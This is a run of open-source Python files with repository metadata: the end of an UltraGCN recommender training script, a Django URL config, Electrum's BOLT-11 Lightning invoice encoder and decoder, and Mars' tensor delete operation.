        "--emb_dim", nargs="?", type=int, help="Dimension of the embedding."
    )
    # NOTE(review): declared type=str but default=False; downstream code
    # appears to treat this as a flag. Kept as-is for backward compatibility.
    parser.add_argument(
        "--tune", nargs="?", type=str, default=False, help="Tune parameter",
    )
    parser.add_argument("--lr", nargs="?", type=float, help="Initialize learning rate.")
    parser.add_argument("--max_epoch", nargs="?", type=int, help="Number of max epoch.")
    parser.add_argument(
        "--batch_size", nargs="?", type=int, help="Batch size for training."
    )
    return parser.parse_args()
class UltraGCN_train(TrainEngine):
    """An instance class from the TrainEngine base class."""

    def __init__(self, config):
        """Initialize UltraGCN_train Class.

        Loads the dataset, fills config["model"] with the constraint
        matrices, then builds the UltraGCN engine.

        Args:
            config (dict): All the parameters for the model.
        """
        self.config = config
        super(UltraGCN_train, self).__init__(config)
        self.load_dataset()
        self.build_data_loader()
        self.engine = UltraGCNEngine(self.config)

    def build_data_loader(self):
        """Load all matrix.

        Stores the train/constraint matrices and the user/item counts in
        config["model"], where UltraGCNEngine reads them.
        """
        train_mat, constraint_mat = self.data.get_constraint_mat(self.config)
        # norm_adj = sparse_mx_to_torch_sparse_tensor(norm_adj_mat)
        self.config["model"]["train_mat"] = train_mat
        self.config["model"]["constraint_mat"] = constraint_mat
        self.config["model"]["n_users"] = self.data.n_users
        self.config["model"]["n_items"] = self.data.n_items

    def train(self):
        """Train the model.

        Starts resource monitoring, trains with a multi-negative-sample
        loader, records the run time and returns the best validation
        performance observed by the eval engine.
        """
        self.monitor = Monitor(
            log_dir=self.config["system"]["run_dir"], delay=1, gpu_id=self.gpu_id
        )
        self.model_save_dir = os.path.join(
            self.config["system"]["model_save_dir"], self.config["model"]["save_name"]
        )
        train_loader = self.data.instance_mul_neg_loader(
            batch_size=self.config["model"]["batch_size"],
            device=self.config["model"]["device_str"],
            num_negative=self.config["model"]["negative_num"],
        )
        self._train(self.engine, train_loader, self.model_save_dir)
        self.config["run_time"] = self.monitor.stop()
        return self.eval_engine.best_valid_performance
if __name__ == "__main__":
    # Parse CLI arguments, then run one full train + test cycle.
    args = parse_args()
    print(args.config_file)
    train_engine = UltraGCN_train(args)
    train_engine.train()
    train_engine.test()
ace941c927fbc0d8a5c30ab8100da0b3a0529514 | 219 | py | Python | example/exampleapp/urls.py | The-Politico/politico-civic-election-night | a8aaf5be43872a7b84d2b0d7c2b6151d32d4d8b6 | [
"MIT"
] | null | null | null | example/exampleapp/urls.py | The-Politico/politico-civic-election-night | a8aaf5be43872a7b84d2b0d7c2b6151d32d4d8b6 | [
"MIT"
] | 55 | 2018-03-19T20:56:04.000Z | 2018-10-10T21:28:26.000Z | example/exampleapp/urls.py | The-Politico/politico-civic-election-night | a8aaf5be43872a7b84d2b0d7c2b6151d32d4d8b6 | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.urls import include, path
# URL routing for the example project.
urlpatterns = [
    path('admin/', admin.site.urls),  # Django admin site
    path('', include('electionnight.urls')),  # electionnight app at the site root
    path('loader/', include('aploader.urls')),  # AP results loader app
]
| 24.333333 | 46 | 0.680365 |
ace941db7ca0ab1c73ca5eff9dc6705aa88a7be1 | 17,331 | py | Python | electrum/lnaddr.py | IHIHIKI/electrum | 5f527720cf2ae4c7aef1cfdcf4244dbceb54a5bc | [
"MIT"
] | null | null | null | electrum/lnaddr.py | IHIHIKI/electrum | 5f527720cf2ae4c7aef1cfdcf4244dbceb54a5bc | [
"MIT"
] | null | null | null | electrum/lnaddr.py | IHIHIKI/electrum | 5f527720cf2ae4c7aef1cfdcf4244dbceb54a5bc | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
# This was forked from https://github.com/rustyrussell/lightning-payencode/tree/acc16ec13a3fa1dc16c07af6ec67c261bd8aff23
import re
import time
from hashlib import sha256
from binascii import hexlify
from decimal import Decimal
import bitstring
from .bitcoin import hash160_to_b58_address, b58_address_to_hash160
from .segwit_addr import bech32_encode, bech32_decode, CHARSET
from . import constants
from . import ecc
from .util import PR_TYPE_LN
from .bitcoin import COIN
# BOLT #11:
#
# A writer MUST encode `amount` as a positive decimal integer with no
# leading zeroes, SHOULD use the shortest representation possible.
def shorten_amount(amount):
    """Return the shortest BOLT-11 string for an amount in bitcoin.

    BOLT #11: A writer MUST encode `amount` as a positive decimal integer
    with no leading zeroes, SHOULD use the shortest representation possible.
    """
    # Convert to pico (the smallest BOLT-11 multiplier unit) initially.
    pico = int(amount * 10**12)
    unit = ''
    # Walk up the multiplier ladder while the value stays a whole number.
    # Bug fix: the original loop also divided on the final '' unit, so
    # whole multiples of 1000 BTC lost a factor of 1000 (1000 BTC -> "1").
    for candidate in ('p', 'n', 'u', 'm'):
        if pico % 1000 != 0:
            unit = candidate
            break
        pico //= 1000
    return str(pico) + unit
def unshorten_amount(amount):
    """ Given a shortened amount, convert it into a decimal
    """
    # BOLT #11 multipliers:
    #   m (milli) = 1e-3, u (micro) = 1e-6,
    #   n (nano)  = 1e-9, p (pico)  = 1e-12
    divisors = {'p': 10**12, 'n': 10**9, 'u': 10**6, 'm': 10**3}
    text = str(amount)
    suffix = text[-1]
    # BOLT #11: a reader SHOULD fail on any non-digit other than a single
    # trailing multiplier letter.
    if not re.fullmatch("\\d+[pnum]?", text):
        raise ValueError("Invalid amount '{}'".format(amount))
    if suffix in divisors:
        return Decimal(text[:-1]) / divisors[suffix]
    return Decimal(text)
# Bech32 spits out array of 5-bit values. Shim here.
def u5_to_bitarray(arr):
    """Pack a sequence of 5-bit integers into one BitArray."""
    packed = bitstring.BitArray()
    for value in arr:
        packed.append(bitstring.pack("uint:5", value))
    return packed
def bitarray_to_u5(barr):
    """Split a bit array whose length is a multiple of 5 into 5-bit ints."""
    assert barr.len % 5 == 0
    stream = bitstring.ConstBitStream(barr)
    return [stream.read(5).uint for _ in range(barr.len // 5)]
def encode_fallback(fallback, currency):
    """ Encode all supported fallback addresses.

    Accepts bech32 (segwit) or base58 (P2PKH/P2SH) addresses for the
    bitcoin mainnet/testnet HRPs and returns a tagged 'f' field.
    """
    if currency in [constants.BitcoinMainnet.SEGWIT_HRP, constants.BitcoinTestnet.SEGWIT_HRP]:
        fbhrp, witness = bech32_decode(fallback, ignore_long_length=True)
        if fbhrp:
            # bech32 address: first data value is the witness version
            if fbhrp != currency:
                raise ValueError("Not a bech32 address for this currency")
            wver = witness[0]
            if wver > 16:
                raise ValueError("Invalid witness version {}".format(witness[0]))
            wprog = u5_to_bitarray(witness[1:])
        else:
            # base58 address: map its version byte to the sentinel witness
            # versions used by this codec (17 = P2PKH, 18 = P2SH; see
            # parse_fallback for the reverse mapping).
            addrtype, addr = b58_address_to_hash160(fallback)
            if is_p2pkh(currency, addrtype):
                wver = 17
            elif is_p2sh(currency, addrtype):
                wver = 18
            else:
                raise ValueError("Unknown address type for {}".format(currency))
            wprog = addr
        return tagged('f', bitstring.pack("uint:5", wver) + wprog)
    else:
        raise NotImplementedError("Support for currency {} not implemented".format(currency))
def parse_fallback(fallback, currency):
    """Decode a tagged 'f' field back into an address.

    Returns None for an unknown witness version so the caller can treat
    the field as unknown, per BOLT #11.
    """
    if currency in [constants.BitcoinMainnet.SEGWIT_HRP, constants.BitcoinTestnet.SEGWIT_HRP]:
        wver = fallback[0:5].uint
        if wver == 17:
            # Pseudo-version 17: P2PKH hash160 -> base58.
            addr = hash160_to_b58_address(fallback[5:].tobytes(), base58_prefix_map[currency][0])
        elif wver == 18:
            # Pseudo-version 18: P2SH hash160 -> base58.
            addr = hash160_to_b58_address(fallback[5:].tobytes(), base58_prefix_map[currency][1])
        elif wver <= 16:
            # Real segwit witness version: re-encode the whole field as bech32.
            addr = bech32_encode(currency, bitarray_to_u5(fallback))
        else:
            return None
    else:
        addr = fallback.tobytes()
    return addr
# Map of classical and witness address prefixes:
# SEGWIT_HRP -> (P2PKH address-type byte, P2SH address-type byte) per chain.
base58_prefix_map = {
    constants.BitcoinMainnet.SEGWIT_HRP : (constants.BitcoinMainnet.ADDRTYPE_P2PKH, constants.BitcoinMainnet.ADDRTYPE_P2SH),
    constants.BitcoinTestnet.SEGWIT_HRP : (constants.BitcoinTestnet.ADDRTYPE_P2PKH, constants.BitcoinTestnet.ADDRTYPE_P2SH)
}
def is_p2pkh(currency, prefix):
    """True if `prefix` is the P2PKH address-type byte for `currency`."""
    return prefix == base58_prefix_map[currency][0]
def is_p2sh(currency, prefix):
    """True if `prefix` is the P2SH address-type byte for `currency`."""
    return prefix == base58_prefix_map[currency][1]
# Tagged field containing BitArray
def tagged(char, l):
    """Wrap BitArray `l` as a BOLT-11 tagged field.

    Layout: a 5-bit tag (position of `char` in the bech32 CHARSET),
    a 10-bit big-endian data length counted in 5-bit groups, then the
    zero-padded payload itself.
    """
    # Tagged fields need to be zero-padded to 5 bits.
    while l.len % 5 != 0:
        l.append('0b0')
    # Use floor division: l.len is a multiple of 5 here, and true division
    # would hand whole-valued floats to bitstring's integer "uint" fields.
    num_groups = l.len // 5
    return bitstring.pack("uint:5, uint:5, uint:5",
                          CHARSET.find(char),
                          num_groups // 32, num_groups % 32) + l
# Tagged field containing bytes
def tagged_bytes(char, l):
    """Wrap raw bytes `l` as a tagged field (see tagged())."""
    return tagged(char, bitstring.BitArray(l))
def trim_to_min_length(bits):
    """Ensures 'bits' have min number of leading zeroes.
    Assumes 'bits' is big-endian, and that it needs to be encoded in 5 bit blocks.
    """
    bits = bits[:]  # copy; the caller's BitArray is left untouched
    # make sure we can be split into 5 bit blocks
    while bits.len % 5 != 0:
        bits.prepend('0b0')
    # Get minimal length by trimming leading 5 bits at a time.
    while bits.startswith('0b00000'):
        if len(bits) == 5:
            break  # v == 0: keep a single all-zero block rather than nothing
        bits = bits[5:]
    return bits
# Discard trailing bits, convert to bytes.
def trim_to_bytes(barr):
    """Return `barr` as bytes, discarding any final partial byte.

    BitArray.tobytes() zero-pads the last byte when the bit length is not
    a multiple of 8; that padded byte is stripped off again here.
    """
    b = barr.tobytes()
    if barr.len % 8 != 0:
        return b[:-1]
    return b
# Try to pull out tagged data: returns tag, tagged data and remainder.
def pull_tagged(stream):
    """Read one tagged field: (tag char, payload bits, remaining stream)."""
    tag = stream.read(5).uint
    # Data length is two 5-bit big-endian digits, counted in 5-bit groups.
    length = stream.read(5).uint * 32 + stream.read(5).uint
    return (CHARSET[tag], stream.read(length * 5), stream)
def lnencode(addr: 'LnAddr', privkey) -> str:
    """Serialize `addr` into a signed bech32 BOLT-11 invoice string."""
    if addr.amount:
        amount = Decimal(str(addr.amount))
        # We can only send down to millisatoshi.
        if amount * 10**12 % 10:
            raise ValueError("Cannot encode {}: too many decimal places".format(
                addr.amount))
        amount = addr.currency + shorten_amount(amount)
    else:
        amount = addr.currency if addr.currency else ''
    hrp = 'ln' + amount
    # Start with the timestamp
    data = bitstring.pack('uint:35', addr.date)
    tags_set = set()
    # Payment hash
    data += tagged_bytes('p', addr.paymenthash)
    tags_set.add('p')
    if addr.payment_secret is not None:
        data += tagged_bytes('s', addr.payment_secret)
        tags_set.add('s')
    for k, v in addr.tags:
        # BOLT #11:
        #
        # A writer MUST NOT include more than one `d`, `h`, `n` or `x` fields,
        if k in ('d', 'h', 'n', 'x', 'p', 's'):
            if k in tags_set:
                raise ValueError("Duplicate '{}' tag".format(k))
        if k == 'r':
            # Private routing hints: each hop is pubkey | short_channel_id |
            # feebase | feerate | cltv_expiry_delta.
            route = bitstring.BitArray()
            for step in v:
                pubkey, channel, feebase, feerate, cltv = step
                route.append(bitstring.BitArray(pubkey) + bitstring.BitArray(channel) + bitstring.pack('intbe:32', feebase) + bitstring.pack('intbe:32', feerate) + bitstring.pack('intbe:16', cltv))
            data += tagged('r', route)
        elif k == 'f':
            data += encode_fallback(v, addr.currency)
        elif k == 'd':
            data += tagged_bytes('d', v.encode())
        elif k == 'x':
            # Expiry is encoded minimally (leading zero groups stripped).
            expirybits = bitstring.pack('intbe:64', v)
            expirybits = trim_to_min_length(expirybits)
            data += tagged('x', expirybits)
        elif k == 'h':
            data += tagged_bytes('h', sha256(v.encode('utf-8')).digest())
        elif k == 'n':
            data += tagged_bytes('n', v)
        elif k == 'c':
            finalcltvbits = bitstring.pack('intbe:64', v)
            finalcltvbits = trim_to_min_length(finalcltvbits)
            data += tagged('c', finalcltvbits)
        elif k == '9':
            if v == 0:
                continue
            feature_bits = bitstring.BitArray(uint=v, length=v.bit_length())
            feature_bits = trim_to_min_length(feature_bits)
            data += tagged('9', feature_bits)
        else:
            # FIXME: Support unknown tags?
            raise ValueError("Unknown tag {}".format(k))
        tags_set.add(k)
    # BOLT #11:
    #
    # A writer MUST include either a `d` or `h` field, and MUST NOT include
    # both.
    if 'd' in tags_set and 'h' in tags_set:
        raise ValueError("Cannot include both 'd' and 'h'")
    if not 'd' in tags_set and not 'h' in tags_set:
        raise ValueError("Must include either 'd' or 'h'")
    # We actually sign the hrp, then data (padded to 8 bits with zeroes).
    msg = hrp.encode("ascii") + data.tobytes()
    privkey = ecc.ECPrivkey(privkey)
    sig = privkey.sign_message(msg, is_compressed=False, algo=lambda x: sha256(x).digest())
    # Recoverable signature: 64-byte r||s, then the recovery id (header - 27).
    recovery_flag = bytes([sig[0] - 27])
    sig = bytes(sig[1:]) + recovery_flag
    data += sig
    return bech32_encode(hrp, bitarray_to_u5(data))
class LnAddr(object):
    """In-memory representation of a BOLT-11 Lightning invoice."""

    def __init__(self, *, paymenthash: bytes = None, amount=None, currency=None, tags=None, date=None,
                 payment_secret: bytes = None):
        self.date = int(date) if date else int(time.time())
        self.tags = tags if tags else []
        self.unknown_tags = []
        self.paymenthash = paymenthash
        self.payment_secret = payment_secret
        self.signature = None
        self.pubkey = None
        self.currency = currency if currency is not None else constants.net.SEGWIT_HRP
        self.amount = amount  # in bitcoins
        self._min_final_cltv_expiry = 9

    def __str__(self):
        key_text = hexlify(self.pubkey.serialize()).decode('utf-8') if self.pubkey else None
        tag_text = ", ".join(name + '=' + str(value) for name, value in self.tags)
        return "LnAddr[{}, amount={}{} tags=[{}]]".format(
            key_text, self.amount, self.currency, tag_text)

    def get_min_final_cltv_expiry(self) -> int:
        return self._min_final_cltv_expiry

    def get_tag(self, tag):
        """Return the value of the first tag named `tag`, or None."""
        for name, value in self.tags:
            if name == tag:
                return value
        return None

    def get_description(self) -> str:
        return self.get_tag('d') or ''

    def get_expiry(self) -> int:
        """Expiry in seconds; BOLT-11 default is 3600 when no 'x' tag is set."""
        expiry = self.get_tag('x')
        return 3600 if expiry is None else int(expiry)

    def is_expired(self) -> bool:
        # BOLT-11 does not specify what expiration of '0' means.
        # we treat it as 0 seconds here (instead of never)
        return time.time() > self.date + self.get_expiry()
# Raised by callers when a lightning invoice cannot be decoded.
class LnDecodeException(Exception): pass
class SerializableKey:
    """Adapter that gives a bare pubkey object a serialize() method."""

    def __init__(self, pubkey):
        self.pubkey = pubkey

    def serialize(self):
        # Compressed (33-byte) SEC encoding.
        return self.pubkey.get_public_key_bytes(True)
def lndecode(invoice: str, *, verbose=False, expected_hrp=None) -> LnAddr:
    """Parse and signature-check a bech32 BOLT-11 invoice into an LnAddr.

    Raises ValueError for malformed input; unknown or wrongly-sized tagged
    fields are collected in LnAddr.unknown_tags instead of being rejected.
    """
    if expected_hrp is None:
        expected_hrp = constants.net.SEGWIT_HRP
    hrp, data = bech32_decode(invoice, ignore_long_length=True)
    if not hrp:
        raise ValueError("Bad bech32 checksum")
    # BOLT #11:
    #
    # A reader MUST fail if it does not understand the `prefix`.
    if not hrp.startswith('ln'):
        raise ValueError("Does not start with ln")
    if not hrp[2:].startswith(expected_hrp):
        raise ValueError("Wrong Lightning invoice HRP " + hrp[2:] + ", should be " + expected_hrp)
    data = u5_to_bitarray(data)
    # Final signature 65 bytes, split it off.
    if len(data) < 65*8:
        raise ValueError("Too short to contain signature")
    sigdecoded = data[-65*8:].tobytes()
    data = bitstring.ConstBitStream(data[:-65*8])
    addr = LnAddr()
    addr.pubkey = None
    # The currency is the leading non-digit run after 'ln'; any remaining
    # characters form the (optional) amount.
    m = re.search("[^\\d]+", hrp[2:])
    if m:
        addr.currency = m.group(0)
        amountstr = hrp[2+m.end():]
        # BOLT #11:
        #
        # A reader SHOULD indicate if amount is unspecified, otherwise it MUST
        # multiply `amount` by the `multiplier` value (if any) to derive the
        # amount required for payment.
        if amountstr != '':
            addr.amount = unshorten_amount(amountstr)
    addr.date = data.read(35).uint
    while data.pos != data.len:
        tag, tagdata, data = pull_tagged(data)
        # BOLT #11:
        #
        # A reader MUST skip over unknown fields, an `f` field with unknown
        # `version`, or a `p`, `h`, or `n` field which does not have
        # `data_length` 52, 52, or 53 respectively.
        data_length = len(tagdata) / 5
        if tag == 'r':
            # BOLT #11:
            #
            # * `r` (3): `data_length` variable. One or more entries
            # containing extra routing information for a private route;
            # there may be more than one `r` field, too.
            # * `pubkey` (264 bits)
            # * `short_channel_id` (64 bits)
            # * `feebase` (32 bits, big-endian)
            # * `feerate` (32 bits, big-endian)
            # * `cltv_expiry_delta` (16 bits, big-endian)
            route = []
            s = bitstring.ConstBitStream(tagdata)
            while s.pos + 264 + 64 + 32 + 32 + 16 < s.len:
                route.append((s.read(264).tobytes(),
                              s.read(64).tobytes(),
                              s.read(32).intbe,
                              s.read(32).intbe,
                              s.read(16).intbe))
            addr.tags.append(('r', route))
        elif tag == 'f':
            fallback = parse_fallback(tagdata, addr.currency)
            if fallback:
                addr.tags.append(('f', fallback))
            else:
                # Incorrect version.
                addr.unknown_tags.append((tag, tagdata))
                continue
        elif tag == 'd':
            addr.tags.append(('d', trim_to_bytes(tagdata).decode('utf-8')))
        elif tag == 'h':
            if data_length != 52:
                addr.unknown_tags.append((tag, tagdata))
                continue
            addr.tags.append(('h', trim_to_bytes(tagdata)))
        elif tag == 'x':
            addr.tags.append(('x', tagdata.uint))
        elif tag == 'p':
            if data_length != 52:
                addr.unknown_tags.append((tag, tagdata))
                continue
            addr.paymenthash = trim_to_bytes(tagdata)
        elif tag == 's':
            if data_length != 52:
                addr.unknown_tags.append((tag, tagdata))
                continue
            addr.payment_secret = trim_to_bytes(tagdata)
        elif tag == 'n':
            if data_length != 53:
                addr.unknown_tags.append((tag, tagdata))
                continue
            pubkeybytes = trim_to_bytes(tagdata)
            addr.pubkey = pubkeybytes
        elif tag == 'c':
            addr._min_final_cltv_expiry = tagdata.int
        elif tag == '9':
            features = tagdata.uint
            addr.tags.append(('9', features))
            from .lnutil import validate_features
            validate_features(features)
        else:
            addr.unknown_tags.append((tag, tagdata))
    if verbose:
        print('hex of signature data (32 byte r, 32 byte s): {}'
              .format(hexlify(sigdecoded[0:64])))
        print('recovery flag: {}'.format(sigdecoded[64]))
        print('hex of data for signing: {}'
              .format(hexlify(hrp.encode("ascii") + data.tobytes())))
        print('SHA256 of above: {}'.format(sha256(hrp.encode("ascii") + data.tobytes()).hexdigest()))
    # BOLT #11:
    #
    # A reader MUST check that the `signature` is valid (see the `n` tagged
    # field specified below).
    addr.signature = sigdecoded[:65]
    hrp_hash = sha256(hrp.encode("ascii") + data.tobytes()).digest()
    if addr.pubkey:  # Specified by `n`
        # BOLT #11:
        #
        # A reader MUST use the `n` field to validate the signature instead of
        # performing signature recovery if a valid `n` field is provided.
        ecc.ECPubkey(addr.pubkey).verify_message_hash(sigdecoded[:64], hrp_hash)
        pubkey_copy = addr.pubkey
        # Note: the class itself (not an instance) is stored, and serialize
        # is a zero-argument plain function attribute, so
        # addr.pubkey.serialize() returns the raw bytes from the 'n' field.
        class WrappedBytesKey:
            serialize = lambda: pubkey_copy
        addr.pubkey = WrappedBytesKey
    else:  # Recover pubkey from signature.
        addr.pubkey = SerializableKey(ecc.ECPubkey.from_sig_string(sigdecoded[:64], sigdecoded[64], hrp_hash))
    return addr
def parse_lightning_invoice(invoice):
    """Decode `invoice` into the request-dict shape used by the wallet."""
    lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
    # LnAddr.amount is in BTC (None for amountless invoices); scale by COIN
    # into integer units (presumably satoshis — confirm COIN's definition).
    amount = int(lnaddr.amount * COIN) if lnaddr.amount else None
    return {
        'type': PR_TYPE_LN,
        'invoice': invoice,
        'amount': amount,
        'message': lnaddr.get_description(),
        'time': lnaddr.date,
        'exp': lnaddr.get_expiry(),
        'pubkey': lnaddr.pubkey.serialize().hex(),
        'rhash': lnaddr.paymenthash.hex(),
    }
if __name__ == '__main__':
    # Manual smoke test: decode an invoice given on the command line.
    # run using
    # python3 -m electrum.lnaddr <invoice> <expected hrp>
    # python3 -m electrum.lnaddr lntb1n1pdlcakepp5e7rn0knl0gm46qqp9eqdsza2c942d8pjqnwa5903n39zu28sgk3sdq423jhxapqv3hkuct5d9hkucqp2rzjqwyx8nu2hygyvgc02cwdtvuxe0lcxz06qt3lpsldzcdr46my5epmj9vk9sqqqlcqqqqqqqlgqqqqqqgqjqdhnmkgahfaynuhe9md8k49xhxuatnv6jckfmsjq8maxta2l0trh5sdrqlyjlwutdnpd5gwmdnyytsl9q0dj6g08jacvthtpeg383k0sq542rz2 tb1n
    import sys
    print(lndecode(sys.argv[1], expected_hrp=sys.argv[2]))
| 35.154158 | 330 | 0.596503 |
ace94261e2a1b4e6e62742616d4442c32a14b85e | 8,530 | py | Python | mars/tensor/base/delete.py | haijohn/mars | 672b3a33a70565f01b1a3f508908445491d85acf | [
"Apache-2.0"
] | 1 | 2021-06-10T02:43:01.000Z | 2021-06-10T02:43:01.000Z | mars/tensor/base/delete.py | JeffroMF/mars | 2805241ac55b50c4f6319baa41113fbf8c723832 | [
"Apache-2.0"
] | null | null | null | mars/tensor/base/delete.py | JeffroMF/mars | 2805241ac55b50c4f6319baa41113fbf8c723832 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import defaultdict
import numpy as np
from ... import opcodes as OperandDef
from ...core import ENTITY_TYPE, recursive_tile
from ...serialization.serializables import Int32Field, Int64Field, AnyField, KeyField
from ...utils import has_unknown_shape
from ..datasource import tensor as astensor
from ..operands import TensorHasInput, TensorOperandMixin
from ..utils import filter_inputs, validate_axis, slice_split, calc_object_length
class TensorDelete(TensorHasInput, TensorOperandMixin):
    """Operand implementing numpy.delete over a (possibly chunked) tensor.

    The index object may be an int, slice, array-like, or another tensor
    (ENTITY_TYPE); axis=None flattens the input first, matching numpy.
    """
    _op_type_ = OperandDef.DELETE

    _index_obj = AnyField('index_obj')
    _axis = Int32Field('axis')
    _input = KeyField('input')

    # for chunk: offset of this chunk's first element along the delete axis;
    # set only when the index object is itself a tensor, so that execute()
    # can translate global indices into chunk-local ones.
    _offset_on_axis = Int64Field('offset_on_axis')

    def __init__(self, index_obj=None, axis=None, offset_on_axis=None, **kw):
        super().__init__(_index_obj=index_obj, _axis=axis,
                         _offset_on_axis=offset_on_axis, **kw)

    @property
    def index_obj(self):
        return self._index_obj

    @property
    def axis(self):
        return self._axis

    @property
    def offset_on_axis(self):
        return self._offset_on_axis

    def _set_inputs(self, inputs):
        # When the index object is a tensor it travels as the second input;
        # re-bind it after inputs are (de)serialized.
        super()._set_inputs(inputs)
        if len(self._inputs) > 1:
            self._index_obj = self._inputs[1]

    @classmethod
    def tile(cls, op: 'TensorDelete'):
        """Split the delete over the input tensor's chunks."""
        inp = op.input
        index_obj = op.index_obj
        axis = op.axis
        if axis is None:
            # numpy semantics: axis=None operates on the flattened tensor.
            inp = yield from recursive_tile(inp.flatten())
            axis = 0
        if has_unknown_shape(inp):
            yield
        if isinstance(index_obj, int):
            index_obj = [index_obj]

        if isinstance(index_obj, ENTITY_TYPE):
            # Index object is a tensor: keep it as a single chunk and pass it
            # to every input chunk along with that chunk's global offset.
            index_obj = yield from recursive_tile(
                index_obj.rechunk(index_obj.shape))
            offsets = np.cumsum([0] + list(inp.nsplits[axis]))
            out_chunks = []
            for c in inp.chunks:
                chunk_op = op.copy().reset_key()
                chunk_op._index_obj = index_obj.chunks[0]
                chunk_op._offset_on_axis = int(offsets[c.index[axis]])
                # Result lengths are unknown until execution time.
                shape = tuple(np.nan if j == axis else s
                              for j, s in enumerate(c.shape))
                out_chunks.append(chunk_op.new_chunk([c, index_obj.chunks[0]],
                                                     shape=shape,
                                                     index=c.index))
            nsplits_on_axis = (np.nan,) * len(inp.nsplits[axis])
        else:
            nsplits_on_axis = [None for _ in inp.nsplits[axis]]
            out_chunks = []
            # index_obj is list, tuple, slice or array like
            if isinstance(index_obj, slice):
                # Split the slice per-chunk; untouched chunks pass through.
                slc_splits = slice_split(index_obj, inp.nsplits[axis])
                for c in inp.chunks:
                    if c.index[axis] in slc_splits:
                        chunk_op = op.copy().reset_key()
                        chunk_slc = slc_splits[c.index[axis]]
                        shape = tuple(s - calc_object_length(chunk_slc, s) if j == axis else s
                                      for j, s in enumerate(c.shape))
                        chunk_op._index_obj = chunk_slc
                        out_chunks.append(
                            chunk_op.new_chunk([c], shape=shape, index=c.index))
                        nsplits_on_axis[c.index[axis]] = shape[axis]
                    else:
                        out_chunks.append(c)
                        nsplits_on_axis[c.index[axis]] = c.shape[axis]
            else:
                # Concrete indices: bucket each global index into the chunk
                # that owns it, converting to chunk-local coordinates.
                index_obj = np.array(index_obj)
                cum_splits = np.cumsum([0] + list(inp.nsplits[axis]))
                chunk_indexes = defaultdict(list)
                for int_idx in index_obj:
                    in_idx = cum_splits.searchsorted(int_idx, side='right') - 1
                    chunk_indexes[in_idx].append(int_idx - cum_splits[in_idx])
                for c in inp.chunks:
                    idx_on_axis = c.index[axis]
                    if idx_on_axis in chunk_indexes:
                        chunk_op = op.copy().reset_key()
                        chunk_op._index_obj = chunk_indexes[idx_on_axis]
                        shape = tuple(s - len(chunk_indexes[idx_on_axis])
                                      if j == axis else s for j, s in enumerate(c.shape))
                        out_chunks.append(
                            chunk_op.new_chunk([c], shape=shape, index=c.index))
                        nsplits_on_axis[c.index[axis]] = shape[axis]
                    else:
                        out_chunks.append(c)
                        nsplits_on_axis[c.index[axis]] = c.shape[axis]

        nsplits = tuple(s if i != axis else tuple(nsplits_on_axis)
                        for i, s in enumerate(inp.nsplits))
        out = op.outputs[0]
        new_op = op.copy()
        return new_op.new_tensors(op.inputs, shape=out.shape, order=out.order,
                                  chunks=out_chunks, nsplits=nsplits)

    @classmethod
    def execute(cls, ctx, op):
        """Run numpy.delete on one chunk's data."""
        inp = ctx[op.input.key]
        index_obj = ctx[op.index_obj.key] if hasattr(op.index_obj, 'key') else op.index_obj
        if op.offset_on_axis is None:
            ctx[op.outputs[0].key] = np.delete(inp, index_obj, axis=op.axis)
        else:
            # Tensor index object: keep only global indices that fall inside
            # this chunk and shift them into chunk-local coordinates.
            index_obj = np.array(index_obj)
            part_index = [idx - op.offset_on_axis for idx in index_obj if (
                (idx >= op.offset_on_axis) and idx < (op.offset_on_axis + inp.shape[op.axis or 0]))]
            ctx[op.outputs[0].key] = np.delete(
                inp, part_index, axis=op.axis)

    def __call__(self, arr, obj, shape):
        return self.new_tensor(filter_inputs([arr, obj]),
                               shape=shape, order=arr.order)
def delete(arr, obj, axis=None):
    """
    Return a new array with sub-arrays along an axis deleted. For a one
    dimensional array, this returns those entries not returned by
    `arr[obj]`.

    Parameters
    ----------
    arr : array_like
        Input array.
    obj : slice, int or array of ints
        Indicate indices of sub-arrays to remove along the specified axis.
    axis : int, optional
        The axis along which to delete the subarray defined by `obj`.
        If `axis` is None, `obj` is applied to the flattened array.

    Returns
    -------
    out : mars.tensor
        A copy of `arr` with the elements specified by `obj` removed. Note
        that `delete` does not occur in-place. If `axis` is None, `out` is
        a flattened array.

    Examples
    --------
    >>> import mars.tensor as mt

    >>> arr = mt.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
    >>> arr.execute()
    array([[ 1,  2,  3,  4],
           [ 5,  6,  7,  8],
           [ 9, 10, 11, 12]])
    >>> mt.delete(arr, 1, 0).execute()
    array([[ 1,  2,  3,  4],
           [ 9, 10, 11, 12]])

    >>> mt.delete(arr, slice(None, None, 2), 1).execute()
    array([[ 2,  4],
           [ 6,  8],
           [10, 12]])
    >>> mt.delete(arr, [1,3,5], None).execute()
    array([ 1,  3,  5,  7,  8,  9, 10, 11, 12])
    """
    # Convert once (the original converted twice in a row, which was redundant).
    arr = astensor(arr)
    # NOTE(review): the message says 'insert'; likely copy-pasted from
    # mt.insert — confirm before changing this user-facing text.
    if getattr(obj, 'ndim', 0) > 1:  # pragma: no cover
        raise ValueError('index array argument obj to insert must be '
                         'one dimensional or scalar')

    if axis is None:
        # if axis is None, the array will be flattened first
        arr_size = arr.size
        idx_length = calc_object_length(obj, size=arr_size)
        shape = (arr_size - idx_length,)
    else:
        validate_axis(arr.ndim, axis)
        idx_length = calc_object_length(obj, size=arr.shape[axis])
        shape = tuple(s - idx_length if i == axis else s
                      for i, s in enumerate(arr.shape))

    op = TensorDelete(index_obj=obj, axis=axis, dtype=arr.dtype)
    return op(arr, obj, shape)
| 39.308756 | 104 | 0.563892 |
ace943756f81fc21b5fdcbc1917e45f1a47b616b | 2,404 | py | Python | core/segments/base.py | molejar/imxmi | 1d59af80d3c5605b8b5c4d5734c05dfd9b75854d | [
"BSD-3-Clause"
] | null | null | null | core/segments/base.py | molejar/imxmi | 1d59af80d3c5605b8b5c4d5734c05dfd9b75854d | [
"BSD-3-Clause"
